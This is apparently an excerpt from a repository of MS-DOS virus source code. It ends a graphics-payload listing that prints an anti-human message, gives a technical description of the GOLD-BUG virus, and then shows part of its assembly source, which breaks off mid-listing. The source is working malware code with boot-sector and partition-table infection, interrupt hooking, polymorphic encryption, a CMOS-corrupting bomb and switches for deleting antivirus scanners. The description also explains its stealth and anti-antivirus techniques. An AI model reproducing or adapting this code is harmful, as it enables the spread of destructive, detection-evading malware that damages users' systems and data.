shl cx,1
add cx,bxpo2
cmp indy,0
je ruty
mov indy,0
cmp karal2,0
jne ruty
push cx
push ax
inc cx
call word ptr [plotdw]
pop ax
pop cx
sub bx,3
ruty: call word ptr [plotdw]
pop cx
loop ck12
ret
novpont: mov ax,pontm
cmp pontszam,ax
je trew
mov cx,pontm
sub cx,pontszam
mov ch,cl
shR cx,1
shr cx,1
yut: loop yut
inc pontszam
ret
trew: call movie
mov bx,bxpo
cmp bx,offset patt
je valto
cmp bx,offset patt+29
je valto
iuy: add bx,novi
mov bxpo,bx
ret
valto: neg novi
jmp iuy
novi dw -1
bxpo dw offset patt
bxpo2 dw 320
novi2 dw 4
karal dw 300
karal2 dw 600
zizi dw -1,offset patt,320,4,300,600
movie: cmp karal,0
je jesty
dec karal
ret
jesty: cmp karal2,0
je jesty2
dec karal2
jesty2: mov bx,bxpo2
cmp bx,100
je valto2
cmp bx,540
je valto2
iuy2: add bx,novi2
mov bxpo2,bx
ret
valto2: neg novi2
jmp iuy2
elokesz: call novpont
mov bl,szogx
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sina,ax
mov ax,costabl[bx]
mov cosa,ax
mov bl,szogy
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sinb,ax
mov ax,costabl[bx]
mov cosb,ax
mov al,szogxvalt
add szogx,al
mov al,szogyvalt
add szogy,al
ret
even
szogx db 0
szogy db 0
szogxvalt db 2
szogyvalt db 5
tavol dw 32767
phase: call elokesz
call fazisrajz
ret
entry: call kezdfazisrajz
rajta1: call phase
cmp pontm,100
je apc
cmp byte ptr ds:[offset ruut +2],0b8h
je ccggaa
mov cx,counterr
mov dx,3bah
qaz1: in al,dx
and al,1
jnz qaz1
qaz2: in al,dx
and al,1
jz qaz2
loop qaz1
jmp apc
ccggaa: mov dx,3dah
qaz3: in al,dx
and al,8
jnz qaz3
qaz4: in al,dx
and al,8
jz qaz4
apc: mov dx,port
in al,dx
and al,1
jz rajta1
ret
even
plotdw dw 0
unplotdw dw 0
sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393
dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279
dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519
dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811
dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898
dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580
dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728
dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273
dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790
dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005
dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151
dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512
dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410
dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808
dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204
dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731
dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105
dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113
dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609
dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521
dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852
dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170
dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530
dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039
dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011
dw -3212, -2410, -1608, -804
costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571
dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683
dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731
dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868
dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279
dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179
dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804
dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602
dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530
dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594
dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790
dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956
dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971
dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757
dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285
dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571
dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731
dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868
dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279
dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179
dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804
dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602
dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793
dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530
dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594
dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790
dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956
dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971
dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757
gombdata:
DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46
DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25
DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21
DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25
DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0
DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2
DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5
DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12
DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30
DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0
DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44
DW 33,15,-33,46,12,-14,48,9,7,40,6,29
DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29
DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44
DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0
DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30
DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12
DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5
DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2
DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0
DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25
DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21
DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25
DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46
DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0
DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46
DW 33,15,-33,44,18,-14,44,21,7,35,24,25
DW 19,26,37,0,29,40,-17,31,34,-29,34,21
DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25
DW 3,43,-23,12,45,-17,16,46,-8,15,47,0
DW 11,48,5,5,49,7,0,49,6,0,49,2
DW 0,49,0,2,49,0,6,49,0,7,49,5
DW 5,48,11,0,47,15,-8,46,16,-17,45,12
DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30
DW 5,36,-33,21,34,-29,34,31,-17,40,29,0
DW 37,26,19,25,24,35,7,21,44,-14,18,44
DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29
DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29
DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44
DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0
DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30
DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12
DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5
DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2
DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0
DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25
DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21
DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25
DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46
DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0
patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27
db 31,35,40,45,50,56,61,67,73,80,86,93
mess db 'HARD HIT & HEAVY HATE the HUMANS !!'
db ' [ H.H.& H.H. the H. ] '
drt dw 5 dup (0)
memory:
CODE ENDS
END START

1083
MSDOS/Virus.MSDOS.Unknown.gold-bug.asm Normal file
View File

File diff suppressed because it is too large Load Diff

161
MSDOS/Virus.MSDOS.Unknown.gold-bug.txt Normal file
View File

@ -0,0 +1,161 @@
Virus Name: GOLD-BUG
Aliases: AU, GOLD, GOLD-FEVER, GOLD-MINE
V Status: New, Research
Discovery: January, 1994
Symptoms: CMOS checksum failure; Creates files with no extension; Modem
answers on 7th ring; BSC but it is hidden; Most virus scanners
fail to run or are Deleted; CHKLIST.??? files deleted.
Origin: USA
Eff Length: 1,024 Bytes
Type Code: SBERaRbReX - Spawning Color Video Resident and Extended HMA
Memory Resident Boot-Sector and Master-Sector Infector
Detection Method: None
Removal Instructions: See Below
General Comments:
GOLD-BUG is a memory-resident multipartite polymorphic stealthing
boot-sector spawning anti-antivirus virus that works with DOS 5 and
DOS 6 in the HIMEM.SYS memory. When an .EXE program infected with the
GOLD-BUG virus is run, it determines if it is running on an 80186 or
better, if not it will terminate and not install. If it is on an
80186 or better it will copy itself to the partition table of the hard
disk and remain resident in memory in the HMA (High Memory Area) only
if the HMA is available, ie. DOS=HIGH in the CONFIG.SYS file else no
infection will occur. The old partition table is moved to sector 14
and the remainder of the virus code is copied to sector 13. The virus
then executes the spawned associated file if present. INT 13 and
INT 2F are hooked into at this time but not INT 21. The spawning
feature of this virus is not active now.
When the computer is rebooted, the virus goes memory resident in the
color video memory. Also at this time the GOLD-BUG virus removes
itself from the partition table and restores the old one back. Unlike
other boot-sector infectors, it does not use the top of memory to
store the code. CHKDSK does not show a decrease in available memory.
At this time it only hooks INT 10 and monitors when the HMA becomes
available. Once DOS moves into the HMA, then GOLD-BUG moves into the
HMA at address FFFF:FB00 to FFFF:FFFF. If the HMA never becomes
available, ie. DOS loaded LOW or the F5 key hit in DOS 6 to bypass the
CONFIG.SYS, then the virus clears itself from the system memory when
the computer changes into graphics mode. If it moves to the HMA, it
hooks INT 13, INT 21 and INT 2F and then rewrites itself back to the
partition table. The GOLD-BUG virus also has some code that stays
resident in the interrupt vector table to always make the HMA
available to the virus. The full features of the virus are now
active.
The GOLD-BUG virus will infect the boot sector of 1.2M diskettes.
The virus copies itself to the boot sector of the diskette and moves
a copy of the boot sector to sector 28 and the remainder of the code
is copied to sector 27. These are the last 2 sectors of the 1.2M disk
root directory. If there are file entries on sector 27 or 28 it will
not overwrite them with the virus code. It will infect 1.2M disks in
drive A: or B: If a clean boot disk is booted from drive A: and you
try to access C: you will get an invalid drive specification.
The boot-sector infection is somewhat unique. If the computer is
booted with a disk that contains the GOLD-BUG virus, it will remain in
video memory until the HMA is available and then infect the hard disk.
Also at this time, it will remove itself from the 1.2M disk. The
virus will never infect this disk again. It makes tracking where you
got the virus from difficult in that your original infected disk is
not infected anymore.
If an .EXE file less than 64K and greater then 1.5K is executed,
GOLD-BUG will randomly decide to spawn a copy of it. The .EXE file is
renamed to the same file name with no extension, ie. CHKDSK.EXE
becomes CHKDSK. The original file attributes are then changed to
SYSTEM. An .EXE file with the same name is created. This .EXE file
has the same length, file date and attributes as the original .EXE
file. This spawning process will not make a copy on a diskette
because it might be write protected and be detected; but it will make
a spawn .EXE file on a network drive. When a spawned file is created,
CHKLIST.??? of the current directory is also deleted. The .EXE file
that is created is actually a .COM file; it has no .EXE header.
The GOLD-BUG virus is very specific as to what type of .EXE files it
will spawn copies. It will not spawn any Windows .EXE files or any
other .EXE files the use the new extended .EXE header except those
that use the PKLITE extended .EXE header. This way all Windows
programs will continue to run and the virus will still be undetected.
The GOLD-BUG virus is also Polymorphic. Each .EXE file it creates
only has 2 bytes that remain constant. It can mutate into 128
different decription patterns. It uses a double decription technique
that involves INT 3 that makes it very difficult to decript using a
debugger. The assembly code allowed for 512 different front-end
decripters. Each of these can mutate 128 different ways.
The GOLD-BUG virus incorporates an extensive steathing technique. Any
time the hard disk partition table or boot sector of an infected
diskette is examined, the copy of the partition table or boot sector
is returned. If a spawned .EXE file is opened to be read or executed;
the GOLD-BUG virus will redirect to the original file. Windows 3.1
will detect a resident boot-sector virus if the "Use 32 Bit Access" is
enabled on the "Virtual Memory" option. GOLD-BUG will disconnect
itself from the INT 13 chain when Windows installs and reconnect when
Windows uninstalles to avoid being detected. When Windows starts, the
GOLD-BUG virus will copy the original hard disk partition table back.
When Windows ends, the GOLD-BUG virus will reinfect the partition
table.
The GOLD-BUG virus also has an extensive anti-antivirus routine. It
can install itself with programs like VSAFE.COM and DISKMON.EXE
resident that monitor changes to the computer that are common for
viruses. It writes to the disk using the original BIOS INT 13 and not
the INT 13 chain that these types of programs have hooked into. It
hooks into the bottom of the interrupt chain rather than changing and
hooking interrupts; very similar to the tunneling technique. If the
GOLD-BUG virus is resident in memory, any attempts to run most virus
scanners will be aborted. GOLD-BUG stops any large .EXE file
(greater than 64k) with the last two letters of "AN" to "AZ". It will
stop SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE, TNTAV.EXE,
etc., etc. The SCAN program will either be deleted or an execution
error will return. Also, GOLD-BUG will cause a CMOS checksum failure
to happen next time the system boots. GOLD-BUG also erases
"CHKLIST.???" created by CPAV.EXE and MSAV.EXE. Programs that do an
internal checksum on themselves will not detect any changes. The
Thunder Byte Antivirus programs contain a partition table program that
claims it can detect all partition table viruses. GOLD-BUG rides
right through the ThunderByte partition virus checker.
The GOLD-BUG virus detects a modem. If you received an incoming call
on the modem line, GOLD-BUG will output a string that will set the
modem to answer on the seventh ring.
If a program tries to erase the infected .EXE file, the original
program and not the infected .EXE file is erased.
The text strings "AU", "1O7=0SLMTA", and "CHKLIST????" appear in the
decripted code. The virus gets it name from "AU", the chemical
element "GOLD". The text string "CHKLIST????" is actually executable
code.
The GOLD-BUG virus has two companion viruses that it works with. The
DA'BOYS virus is also a boot-sector infector. It is possible to have
a diskette with two boot-sector viruses. GOLD-BUG hides the presence
of the DA'BOYS virus from the Windows 3.1 startup routine. GOLD-BUG
removes the DA'BOYS virus from the INT 13 chain at the start of
Windows and restores it when Windows ends. The GOLD-BUG virus works
with the XYZ virus; it reserves the space FFFF:F900 to FFFF:FAFF in
the HMA for the XYZ virus so it can load as well.
To remove the GOLD-BUG virus, change DOS=HIGH to DOS=LOW in the
CONFIG.SYS, then reboot. Once the system comes up again, reboot from
a clean boot disk. The Virus has now removed itself from the
partition table and memory. With the ATTRIB command check for files
with the SYSTEM bit set that don't have any extension. Delete the
.EXE file associated with the SYSTEM file. Using ATTRIB remove the
SYSTEM attribute. Rename the file with no extension to an .EXE file.
Format each diskette or run SYS to remove the virus from the boot
sector of each 1.2M disk. Any spawned .EXE files copied to diskette
need to be deleted.
Several variations of this virus can exist. The assembly code allowed
for 14 features to be turned on or off: Delete Scanners, Check for
8088, Infect at Random, Deflect Delete, CMOS Bomb, File Reading
Stealth, Same File Date, Double Decription, Execute Spawned, Modem
Code, Anti-Antivirus, Polymorphic, Multipartite and 720K or 1.2M
Diskette Infection. Some of these features can be disabled and more
code added to change the characteristics of this virus.

683
MSDOS/Virus.MSDOS.Unknown.goldbug.asm Normal file
View File

@ -0,0 +1,683 @@
cseg segment para public 'code'
gold_bug proc near
assume cs:cseg
;-----------------------------------------------------------------------------
;designed by "Q" the misanthrope.
;-----------------------------------------------------------------------------
.186
TRUE equ 001h
FALSE equ 000h
;-----------------------------------------------------------------------------
;option bytes used and where
DELETE_SCANNERS equ FALSE ; -2 bytes -2 in com_code
CHECK_FOR_8088 equ TRUE ; 4 bytes 4 in com_code
INFECT_RANDOM equ TRUE ; 4 bytes 4 in com_code
CMOS_BOMB equ TRUE ; 4 bytes 4 in com_code
DEFLECT_DELETE equ TRUE ; 5 bytes 5 in com_code
READING_STEALTH equ TRUE ; 5 bytes 5 in com_code
SAME_FILE_DATE equ TRUE ; 24 bytes 24 in com_code
DOUBLE_DECRYPT equ TRUE ; 26 bytes 26 in com_code
EXECUTE_SPAWNED equ TRUE ; 35 bytes 32 in com_code 3 in boot_code
MODEM_CODE equ TRUE ; 40 bytes 29 in com_code 11 in boot_code
ANTI_ANTIVIRUS equ TRUE ; 46 bytes 35 in com_code 11 in boot_code
POLYMORPHIC equ TRUE ; 90 bytes 74 in com_code 16 in boot_code
MULTIPARTITE equ TRUE ;372 bytes 346 in com_code 26 in boot_code
;-----------------------------------------------------------------------------
;floppy boot infection
FLOPPY_1_2M equ 001h
FLOPPY_760K equ 000h
FLOPPY_TYPE equ FLOPPY_1_2M
;-----------------------------------------------------------------------------
IFE MULTIPARTITE
DELETE_SCANNERS equ FALSE
CHECK_FOR_8088 equ FALSE
INFECT_RANDOM equ FALSE
DEFLECT_DELETE equ FALSE
READING_STEALTH equ FALSE
SAME_FILE_DATE equ FALSE
EXECUTE_SPAWNED equ FALSE
POLYMORPHIC equ FALSE
ENDIF
;-----------------------------------------------------------------------------
SECTOR_SIZE equ 00200h
RES_OFFSET equ 0fb00h
COM_OFFSET equ 00100h
RELATIVE_OFFSET equ RES_OFFSET-COM_OFFSET
PART_OFFSET equ COM_OFFSET+SECTOR_SIZE
BOOT_OFFSET equ 07c00h
RELATIVE_BOOT equ BOOT_OFFSET-PART_OFFSET
LOW_JMP_10 equ 0031ch
LOW_JMP_21 equ 00321h
SAVE_INT_CHAIN equ 0032ch
SCRATCH_AREA equ 08000h
HEADER_SEGMENT equ 00034h
INT_21_IS_NOW equ 0cch
BIOS_INT_13 equ 0c6h
NEW_INT_13_LOOP equ 0cdh
BOOT_SECTOR equ 001h
DESCRIPTOR_OFF equ 015h
IF FLOPPY_TYPE EQ FLOPPY_1_2M
DESCRIPTOR equ 0f909h
OLD_BOOT_SECTOR equ 00eh
COM_CODE_SECTOR equ 00dh
ELSE
DESCRIPTOR equ 0f905h
OLD_BOOT_SECTOR equ 005h
COM_CODE_SECTOR equ 004h
ENDIF
READ_ONLY equ 001h
SYSTEM equ 004h
DELTA_RI equ 004h
DSR equ 020h
CTS equ 010h
CD equ 080h
FAR_JUMP equ 0eah
MIN_FILE_SIZE equ 00500h
PSP_SIZE equ 00100h
VIRGIN_INT_13_A equ 00806h
VIRGIN_INT_13_B equ 007b4h
VIRGIN_INT_2F equ 00706h
FAR_JUMP_OFFSET equ 006h
SET_INT_OFFSET equ 007h
CHANGE_SEG_OFF equ 009h
VIDEO_MODE equ 00449h
MONOCHROME equ 007h
COLOR_VIDEO_MEM equ 0b000h
ADDR_MUL equ 004h
SINGLE_BYTE_INT equ 003h
VIDEO_INT equ 010h
VIDEO_INT_ADDR equ VIDEO_INT*ADDR_MUL
DISK_INT equ 013h
DISK_INT_ADDR equ DISK_INT*ADDR_MUL
SERIAL_INT equ 014h
DOS_INT equ 021h
DOS_INT_ADDR equ DOS_INT*ADDR_MUL
MULTIPLEX_INT equ 02fh
COMMAND_LINE equ 080h
FIRST_FCB equ 05ch
SECOND_FCB equ 06ch
NULL equ 00000h
GET_PORT_STATUS equ 00300h
WRITE_TO_PORT equ 00100h
HD_0_HEAD_0 equ 00080h
READ_A_SECTOR equ 00201h
WRITE_A_SECTOR equ 00301h
GET equ 000h
SET equ 001h
DELETE_W_FCB equ 01300h
DEFAULT_DRIVE equ 000h
GET_DEFAULT_DR equ 01900h
DOS_SET_INT equ 02500h
FILE_DATE_TIME equ 05700h
DENYNONE equ 040h
OPEN_W_HANDLE equ 03d00h
READ_W_HANDLE equ 03f00h
WRITE_W_HANDLE equ 04000h
CLOSE_HANDLE equ 03e00h
UNLINK equ 04100h
FILE_ATTRIBUTES equ 04300h
RESIZE_MEMORY equ 04a00h
QUERY_FREE_HMA equ 04a01h
ALLOCATE_HMA equ 04a02h
EXEC_PROGRAM equ 04b00h
GET_ERROR_LEVEL equ 04d00h
TERMINATE_W_ERR equ 04c00h
RENAME_A_FILE equ 05600h
LSEEK_TO_END equ 04202h
CREATE_NEW_FILE equ 05b00h
RESIDENT_LENGTH equ 068h
PARAMETER_TABLE equ 005f1h
MAX_PATH_LENGTH equ 00080h
EXE_HEADER_SIZE equ 020h
NEW_EXE_HEADER equ 00040h
NEW_EXE_OFFSET equ 018h
PKLITE_SIGN equ 'KP'
PKLITE_OFFSET equ 01eh
NO_OF_COM_PORTS equ 004h
WINDOWS_BEGIN equ 01605h
WINDOWS_END equ 01606h
ERROR_IN_EXE equ 0000bh
IF POLYMORPHIC
FILE_SIGNATURE equ 07081h
XOR_SWAP_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+TWO_BYTES
FILE_LEN_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+THREE_BYTES
FIRST_UNDO_OFF equ byte ptr ((offset first_jmp)-(offset com_code)+ONE_BYTE)
SECOND_UNDO_OFF equ byte ptr ((offset second_jmp)-(offset com_code))
BL_BX_OFFSET equ byte ptr ((offset incbl_incbx)-(offset com_code))
ROTATED_OFFSET equ byte ptr ((offset rotated_code)-(offset com_code))
ELSE
FILE_SIGNATURE equ 0070eh
ENDIF
IF MODEM_CODE
STRING_LENGTH equ byte ptr ((offset partition_sig)-(offset string))
ENDIF
IF EXECUTE_SPAWNED
EXEC_SUBTRACT equ byte ptr ((offset file_name)-(offset exec_table))
ENDIF
DH_OFFSET equ byte ptr ((offset dh_value )-(offset initialize_boot)+TWO_BYTES)
ONE_NIBBLE equ 004h
ONE_BYTE equ 001h
TWO_BYTES equ 002h
THREE_BYTES equ 003h
FOUR_BYTES equ 004h
FIVE_BYTES equ 005h
FIVE_BITS equ 005h
EIGHT_BYTES equ 008h
USING_HARD_DISK equ 080h
KEEP_CF_INTACT equ 002h
CMOS_CRC_ERROR equ 02eh
CMOS_PORT equ 070h
REMOVE_NOP equ 001h
CR equ 00dh
LF equ 00ah
INT3_INCBX equ 043cch
INC_BL equ 0c3feh
INCBX_INCBL_XOR equ INT3_INCBX XOR INC_BL
JMP_NO_SIGN equ 079h
JMP_NOT_ZERO equ 075h
JNS_JNZ_XOR equ JMP_NO_SIGN XOR JMP_NOT_ZERO
CLI_PUSHCS equ 00efah
;-----------------------------------------------------------------------------
video_seg segment at 0c000h
org 00000h
original_int_10 label word
video_seg ends
;-----------------------------------------------------------------------------
io_seg segment at 00070h
org 00893h
original_2f_jmp label word
io_seg ends
;-----------------------------------------------------------------------------
org COM_OFFSET
com_code:
;-----------------------------------------------------------------------------
IF POLYMORPHIC
first_decode proc near
serial_number: xor word ptr ds:[si+bx+FIRST_UNDO_OFF],MIN_FILE_SIZE
org $-REMOVE_NOP
org $-FIVE_BYTES
jmp load_it
org $+TWO_BYTES
rotated_code: int SINGLE_BYTE_INT
into
adc al,0d4h
incbl_incbx: inc bl
first_jmp: jnz serial_number
add bx,si
jns serial_number
first_decode endp
;-----------------------------------------------------------------------------
IF DOUBLE_DECRYPT
second_decode proc near
push si
get_next_byte: lodsw
add bx,ax
inc bx
xor byte ptr ds:[si+SECOND_UNDO_OFF],bl
org $-REMOVE_NOP
dec si
second_jmp: jns get_next_byte
pop si
second_decode endp
ENDIF
ENDIF
;-----------------------------------------------------------------------------
com_start proc near
IF MULTIPARTITE
push cs
pop es
call full_move_w_si
mov ds,cx
cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL]
jne dont_set_int
mov di,VIRGIN_INT_13_B
call set_both_ints
push cs
pop es
ENDIF
dont_set_int: IF CHECK_FOR_8088
mov cl,RESIDENT_LENGTH
mov al,high(RESIZE_MEMORY)
shl ax,cl
mov bx,cx
int DOS_INT
ELSEIF MULTIPARTITE
mov bx,RESIDENT_LENGTH
mov ah,high(RESIZE_MEMORY)
int DOS_INT
ENDIF
IF EXECUTE_SPAWNED
pusha
call from_com_code+RELATIVE_OFFSET
popa
push cs
pop ds
push cs
pop es
cmpsw
mov dx,si
sub si,EXEC_SUBTRACT
org $-REMOVE_NOP
mov bx,PARAMETER_TABLE
mov di,bx
mov ax,EXEC_PROGRAM
set_table: scasw
movsb
scasb
mov word ptr ds:[di],ds
je set_table
int DOS_INT
mov ah,high(GET_ERROR_LEVEL)
int DOS_INT
mov ah,high(TERMINATE_W_ERR)
ELSEIF MULTIPARTITE
call from_com_code+RELATIVE_OFFSET
mov ax,TERMINATE_W_ERR
ENDIF
IF MULTIPARTITE
int DOS_INT
ELSE
jmp boot_load
ENDIF
com_start endp
;-----------------------------------------------------------------------------
high_code proc near
mov dx,offset int_10_start+RELATIVE_OFFSET
mov bx,LOW_JMP_10-FAR_JUMP_OFFSET
call set_int_10_21
mov bx,VIDEO_INT_ADDR-SET_INT_OFFSET
low_code: mov es,cx
mov cl,OLD_BOOT_SECTOR
mov dx,LOW_JMP_10
call set_interrupt
mov bx,BOOT_OFFSET
pop dx
int DISK_INT
xor dh,dh
mov cl,BOOT_SECTOR
mov ax,WRITE_A_SECTOR
high_code endp
;-----------------------------------------------------------------------------
interrupt_13 proc far
int_13_start: IF MULTIPARTITE
mov byte ptr cs:[drive_letter+ONE_BYTE+RELATIVE_OFFSET],dl
ENDIF
cmp cx,BOOT_SECTOR
jne no_boot_sector
cmp ah,high(READ_A_SECTOR)
jne no_boot_sector
cmp dx,HD_0_HEAD_0
jbe reread_boot
no_boot_sector: int NEW_INT_13_LOOP
jmp short return_far
reread_boot: int NEW_INT_13_LOOP
jc return_far
pusha
push ds
push es
pop ds
check_old_boot: mov ax,READ_A_SECTOR
xor dh,dh
mov cl,OLD_BOOT_SECTOR
IF ANTI_ANTIVIRUS
cmp word ptr ds:[bx],'HC'
ELSE
cmp word ptr ds:[bx],CLI_PUSHCS
ENDIF
je read_old_boot
test dl,USING_HARD_DISK
jnz encode_hd
cmp word ptr ds:[bx+DESCRIPTOR_OFF-ONE_BYTE],DESCRIPTOR
jne time_to_leave
mov dh,al
pusha
int NEW_INT_13_LOOP
cmp byte ptr ds:[bx],ch
popa
pushf
pusha
xor dh,dh
mov cl,al
int NEW_INT_13_LOOP
popa
popf
jne time_to_leave
encode_hd: mov ah,high(WRITE_A_SECTOR)
push ax
int NEW_INT_13_LOOP
pop ax
jc time_to_leave
mov di,bx
call move_code
mov cl,COM_CODE_SECTOR
IF POLYMORPHIC
xor byte ptr ds:[bx+XOR_SWAP_OFFSET],dh
org $-REMOVE_NOP
jo dont_flip_it
xchg word ptr ds:[bx+ROTATED_OFFSET],ax
org $-REMOVE_NOP
xchg ah,al
xchg word ptr ds:[bx+ROTATED_OFFSET+TWO_BYTES],ax
org $-REMOVE_NOP
xchg word ptr ds:[bx+ROTATED_OFFSET],ax
org $-REMOVE_NOP
ENDIF
dont_flip_it: pusha
int NEW_INT_13_LOOP
popa
mov di,bx
call move_some_more
mov byte ptr ds:[bx+DH_OFFSET],dh
org $-REMOVE_NOP
mov dh,cl
inc cx
int NEW_INT_13_LOOP
jmp short check_old_boot
read_old_boot: mov dh,byte ptr ds:[bx+DH_OFFSET]
org $-REMOVE_NOP
int NEW_INT_13_LOOP
time_to_leave: pop ds
popa
clc
return_far: retf KEEP_CF_INTACT
interrupt_13 endp
;-----------------------------------------------------------------------------
interrupt_2f proc far
pusha
push ds
push es
push offset return_to_2f+RELATIVE_OFFSET
xor cx,cx
mov ds,cx
mov bx,SAVE_INT_CHAIN-SET_INT_OFFSET
cmp ax,WINDOWS_END
jne try_another
les dx,dword ptr ds:[bx+SET_INT_OFFSET]
jmp short set_13_chain
try_another: cmp ax,WINDOWS_BEGIN
jne another_return
mov di,VIRGIN_INT_13_B
call get_n_set_int+ONE_BYTE
les dx,dword ptr ds:[BIOS_INT_13*ADDR_MUL]
set_13_chain: mov ax,READ_A_SECTOR
call get_set_part
mov bx,VIRGIN_INT_13_B-SET_INT_OFFSET
call set_interrupt
mov bl,low(VIRGIN_INT_13_A-SET_INT_OFFSET)
call set_interrupt
mov ah,high(WRITE_A_SECTOR)
interrupt_2f endp
;-----------------------------------------------------------------------------
get_set_part proc near
pusha
push es
mov bx,SCRATCH_AREA
